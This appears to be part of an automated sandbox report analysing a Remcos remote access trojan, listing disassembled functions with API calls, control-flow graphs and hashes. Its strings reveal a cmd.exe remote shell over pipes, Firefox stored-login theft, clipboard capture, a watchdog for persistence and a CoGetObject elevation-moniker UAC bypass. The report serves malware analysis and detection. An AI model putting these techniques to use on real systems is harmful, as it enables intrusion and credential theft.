                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                • String ID: PkGNG
                                • API String ID: 2403171778-263838557
                                • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 30 448566-44857a 31 448587-4485a2 LoadLibraryExW 30->31 32 44857c-448585 30->32 33 4485a4-4485ad GetLastError 31->33 34 4485cb-4485d1 31->34 35 4485de-4485e0 32->35 36 4485bc 33->36 37 4485af-4485ba LoadLibraryExW 33->37 38 4485d3-4485d4 FreeLibrary 34->38 39 4485da 34->39 40 4485be-4485c0 36->40 37->40 38->39 41 4485dc-4485dd 39->41 40->34 42 4485c2-4485c9 40->42 41->35 42->41
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 43 40d069-40d095 call 401fab CreateMutexA GetLastError
                                APIs
                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: SG
                                • API String ID: 1925916568-3189917014
                                • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 60 4484ca-4484f4 61 4484f6-4484f8 60->61 62 44855f 60->62 63 4484fe-448504 61->63 64 4484fa-4484fc 61->64 65 448561-448565 62->65 66 448506-448508 call 448566 63->66 67 448520 63->67 64->65 70 44850d-448510 66->70 69 448522-448524 67->69 71 448526-448534 GetProcAddress 69->71 72 44854f-44855d 69->72 73 448541-448547 70->73 74 448512-448518 70->74 75 448536-44853f call 43436e 71->75 76 448549 71->76 72->62 73->69 74->66 77 44851a 74->77 75->64 76->72 77->67
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 80 40165e-401664 81 401666-401668 80->81 82 401669-401674 80->82 83 401676 82->83 84 40167b-401685 82->84 83->84 85 401687-40168d 84->85 86 4016a8-4016a9 call 4344ea 84->86 85->86 88 40168f-401694 85->88 89 4016ae-4016af 86->89 88->83 90 401696-4016a6 call 4344ea 88->90 91 4016b1-4016b3 89->91 90->91
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 94 4500d4-4500e1 call 445af3 96 4500e6-4500f1 94->96 97 4500f7-4500ff 96->97 98 4500f3-4500f5 96->98 99 45013f-45014d call 446782 97->99 100 450101-450105 97->100 98->99 101 450107-450139 call 448a84 100->101 106 45013b-45013e 101->106 106->99
                                APIs
                                  • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                • _free.LIBCMT ref: 00450140
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 107 445af3-445afe 108 445b00-445b0a 107->108 109 445b0c-445b12 107->109 108->109 110 445b40-445b4b call 4405dd 108->110 111 445b14-445b15 109->111 112 445b2b-445b3c RtlAllocateHeap 109->112 118 445b4d-445b4f 110->118 111->112 113 445b17-445b1e call 445545 112->113 114 445b3e 112->114 113->110 120 445b20-445b29 call 442f80 113->120 114->118 120->110 120->112
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 123 446137-446143 124 446175-446180 call 4405dd 123->124 125 446145-446147 123->125 132 446182-446184 124->132 127 446160-446171 RtlAllocateHeap 125->127 128 446149-44614a 125->128 129 446173 127->129 130 44614c-446153 call 445545 127->130 128->127 129->132 130->124 135 446155-44615e call 442f80 130->135 135->124 135->127
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-13974260
                                • Opcode ID: 40b24dbe1f17985f058b8880f0b35abadd5faaf693f7cda90d1833beab63ca48
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: 40b24dbe1f17985f058b8880f0b35abadd5faaf693f7cda90d1833beab63ca48
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004168C1 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@$hdF
                                • API String ID: 3520204547-3475379602
                                • Opcode ID: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
